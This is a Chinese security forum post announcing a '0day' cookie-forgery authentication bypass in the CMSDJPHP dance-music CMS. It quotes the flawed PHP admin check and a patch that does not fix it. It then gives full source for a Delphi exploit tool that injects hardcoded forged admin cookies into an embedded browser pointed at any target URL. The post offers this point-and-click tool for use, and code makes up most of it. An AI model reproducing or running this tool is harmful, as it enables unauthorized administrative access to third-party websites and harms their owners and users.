CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day

2012-12-23 21:36:09 19 3550
应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。
这是一个神级漏洞,体现了程序员的神逻辑。
看代码
admin/admin_check.php
<?php



$CD_Version='V1.0';

$CD_Build='20100501';

function admincheck($CD_Permission){

if($_COOKIE['CD_Permission']<>''){

$menuarr=explode(',',$_COOKIE['CD_Permission']);

$adminlogined='False';

for($i=0;$i<count($menuarr);$i++){

if($menuarr[$i]==$CD_Permission){$adminlogined='True';}

}

if($adminlogined=='False'){AdminAlert('出错了,您没有进入本页面的权限!','',2);}

}else{

AdminAlert('出错了,您没有进入本页面的权限!','',2);

}

}

if(empty($_COOKIE['CD_AdminID'])){

AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);

}elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){//亮点在这句

AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);

}
刚刚看的官网最新补丁,注释了两条无关的代码而已:
$CD_Version="V1.1";

$CD_Build="20121208";



        //if(!eregi($_SERVER['SERVER_NAME'],$_SERVER['HTTP_REFERER'])){

        //        echo "<br><p align=center><font color='red' style='font-size:9pt'>对不起,为了系统安全,不允许直接输入地址访问本系统的后台管理页面。</font></p>";

        //        exit();   

        //}



        function admincheck($CD_Permission){

                if($_COOKIE['CD_Permission']<>""){

                        $menuarr=explode(",",$_COOKIE['CD_Permission']);

                        $adminlogined="False";

                        for($i=0;$i<count($menuarr);$i++){

                                if($menuarr[$i]==$CD_Permission){$adminlogined="True";}

                        }

                        //if($adminlogined=="False"){AdminAlert("出错了,您没有进入本页面的权限!","",2);}

                }else{

                        //AdminAlert("出错了,您没有进入本页面的权限!","",2);

                }

        }



        if(empty($_COOKIE['CD_AdminID'])){

                AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);

        }elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){

                AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);

        }
利用,自己构造一个能让它计算正确的cookies,实在不知道安装一个系统。然后登陆一次。提取自己的cookies。使用delphi 画个webbrowser控件,设置下cookies,傻瓜化工具就诞生了。
unit uMain;

{

   T00ls首发

}



interface



uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, bsSkinData, BusinessSkinForm, bsSkinCtrls, OleCtrls, SHDocVw,

  StdCtrls, Mask, bsSkinBoxCtrls,MSHTML;



type

  TfrmMyFish = class(TForm)

    bsBusinessSkinForm1: TbsBusinessSkinForm;

    bsCompressedStoredSkin1: TbsCompressedStoredSkin;

    bsSkinData1: TbsSkinData;

    pnlContorl: TbsSkinPanel;

    pnlBrowser: TbsSkinPanel;

    wbAdmin: TWebBrowser;

    lblURL: TbsSkinStdLabel;

    edtURL: TbsSkinEdit;

    btnGo: TbsSkinSpeedButton;

    lblFishAdmin: TbsSkinStdLabel;

    edtFishAdmin: TbsSkinEdit;

    pnlLoading: TbsSkinPanel;

    GaugeLoading: TbsSkinGauge;

    lblLoading: TbsSkinStdLabel;

    procedure btnGoClick(Sender: TObject);

    procedure FormResize(Sender: TObject);

    procedure FormCreate(Sender: TObject);

    procedure wbAdminProgressChange(Sender: TObject; Progress,

      ProgressMax: Integer);

  private

    { Private declarations }

  public

    { Public declarations }

  end;



const

  COOKIE_HEAD = 'CD_Login=1df476c11ce215ad5a402afe5f370148; ';

  COOKIE_PASS = 'CD_AdminID=1; CD_AdminUserName=admin; CD_AdminPassWord=7622f895d131b0155232085e7b4a7654; CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11; ';

var

  frmMyFish: TfrmMyFish;

  Doc: IHTMLDocument2;

  IsTrue: Boolean;

  iP: Integer;



implementation



{$R *.dfm}



function EncDecCode(Text:String; XorPass: Integer): String;

var

  i, Len: integer;

begin

  Result:='';

  Len := StrLen(Pchar(Text));

  for i := 1 to Len do

  begin

    Result := Result + Chr(Ord(Text[i]) xor XorPass);

  end;

end;



function XCode(Str:String):String;

begin

  Result:='';

  Result:=PChar(EncDecCode(Str,12));

end;



procedure TfrmMyFish.btnGoClick(Sender: TObject);

var

  sCookies: string;

  sList: TStrings;

  i: Integer;

begin

  sCookies := COOKIE_HEAD + COOKIE_PASS;

  lblLoading.Caption := '正在努力···';

  pnlBrowser.Visible := False;

  pnlLoading.Visible := True;

  wbAdmin.Navigate(edtURL.Text);

  repeat

    Application.ProcessMessages;

    Sleep(50);

  until not wbAdmin.Busy;

  Doc := wbadmin.Document as IHTMLDocument2;

  sList := TStringList.Create;

  try

    sList.CommaText := sCookies;

    for i:=0 to sList.Count-1 do

    begin

      Doc.cookie := sList.Strings[i];

    end;

    pnlBrowser.Visible := True;

    pnlLoading.Visible := False;

    wbAdmin.Refresh;

  finally

    sList.Free;

  end;

end;



procedure TfrmMyFish.FormResize(Sender: TObject);

begin

  edtURL.Width := pnlContorl.Width - 150 - 100;

  btnGo.Left := pnlContorl.Width - 75;

  GaugeLoading.Width := pnlLoading.Width div 100 * 70;

  GaugeLoading.Left := (pnlLoading.Width - GaugeLoading.Width) div 2;

  GaugeLoading.Top  := pnlLoading.Height div 2 - 100;

  lblLoading.Width := pnlLoading.Width div 100 * 70;

  lblLoading.Left :=  (pnlLoading.Width - GaugeLoading.Width) div 2;

  lblLoading.Top :=  pnlLoading.Height div 2 + 50;

end;



procedure TfrmMyFish.FormCreate(Sender: TObject);

begin

  pnlBrowser.Visible := False;

  pnlBrowser.Align := alClient;

  wbAdmin.Align    := alClient;

  pnlLoading.Visible := True;

  pnlLoading.Align := alClient;

  GaugeLoading.Value := 0;

  lblLoading.Caption := '初始化完毕。';

end;



procedure TfrmMyFish.wbAdminProgressChange(Sender: TObject; Progress,

  ProgressMax: Integer);

begin

  if ProgressMax<>0 then

  begin

    iP:=Progress*100 div ProgressMax;

    GaugeLoading.Value := iP;

  end else;

end;



end.
类别 Web安全

关于作者

charlie8篇文章134篇回复

charlie
19

评论19次

要评论?请先  登录  或  注册